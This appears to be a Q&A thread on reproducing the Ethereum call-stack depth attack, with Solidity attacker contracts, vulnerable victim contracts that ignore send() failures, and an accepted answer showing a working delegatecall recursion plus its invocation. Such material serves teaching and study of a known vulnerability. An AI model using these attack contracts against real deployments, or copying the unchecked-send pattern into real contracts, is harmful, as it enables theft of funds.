# Reproducing stack depth attack

Tags: security, contract-debugging, call-depth-attacks

Victim contract allows one time withdraw only. I want to attack it using stack depth attack to withdraw everything it has. I've tried different things, but can't get the desired result. Here's where I'm stuck:

**My actions:**

- Attacker.setVictimAddress(victimAddress);
- Attacker.reachStackDepth(0);

---

```
contract Attacker {
    address victimAddress;
    function attack(){
        victimAddress.call.value(1 ether)(bytes4(sha3('bid()')), this);
    }
    function reachStackDepth(uint x){
        if(x == 1023) {
            attack();
        }
        Attacker(this).reachStackDepth(x++);
    }
    function setVictimAddress(address _victimAddress){
        victimAddress = _victimAddress;
    }
}
```

---

```
contract Victim {
   address highestBidder;
   uint highestBid;
   function bid() {
      if (msg.value < highestBid) throw;
      if (highestBidder != 0)
      highestBidder.send(highestBid); // refund previous bidder
      highestBidder = msg.sender;
      highestBid = msg.value;
   }     
}
```

Here's VM trace and all that https://testnet.etherscan.io/vmtrace?txhash=0x285acada3e003173d6e90855ebb44872b3065037b323d5858f6c12c160a98eb5

Answer (score 3, accepted):

Whew, I've figured it out. I couldn't make stack depth attack work with `call` though. I used `delegatecall` instead. Here's an example that shows how it works.

```
contract Attacker {
    Victim public victimContract;
    uint x;

    function Attacker(){
        victimContract = (new Victim).value(10 wei)();
    }

    function attack(uint y) {
        if (y > x) {
            this.delegatecall(bytes4(sha3('attack(uint256)')), --y);
        }
        else {
            victimContract.donate.value(1)(this, 1);
        }
    }
}

contract Victim {
    mapping(address => uint) karma;
    function donate(address someAddress, uint amount){
        if(msg.value == amount) {
            someAddress.send(amount);
            karma[msg.sender] += amount;
        }            
    }
}
```

Here's how it works(from JS side):

- `Attacker.attack(1023, {gas:700000, value: 1});`

Answer (score 3):

Instead of `Attacker(this).reachStackDepth(x++);`, shouldn't you do `Attacker(this).reachStackDepth(++x);`? Or do `x++;` before you call `reachStackDepth()`.

Comment: oh, yeah, that's right, missed this. However, it doesn't work after the change. I get only 117 internal transactions and it stops there for some reason. https://testnet.etherscan.io/address/0x8a63e55d74f8d842934872b38bcde00798a839b3#internaltx

Comment: ,I think the problem might be in that the recursive call is still going after x == 1023

Comment: Each recursive call consumes 25,350 gas. So, very roughly, with 3,000,000 gas to start with you can only go so far as 118 deep. You need to find a way to reduce this cost. How about replacing `Attacker(this).reachStackDepth(++x);` with `reachStackDepth(++x);`. Other tricks, would a bitwise `x & 512` help? Also, you could make one function for the first 512 calls, another for the next 256 calls and so on, so you only then check on the next bit. Otherwise, but I cannot help, assembly...

Comment: just learned that calling without **this** is exhausting the EVM stack, not the call stack.

Comment: Interesting, can you elaborate?

Comment: I get it from here https://www.reddit.com/r/ethereum/comments/4z7y4l/any_resources_on_how_to_execute_a_stack_depth/d6udl24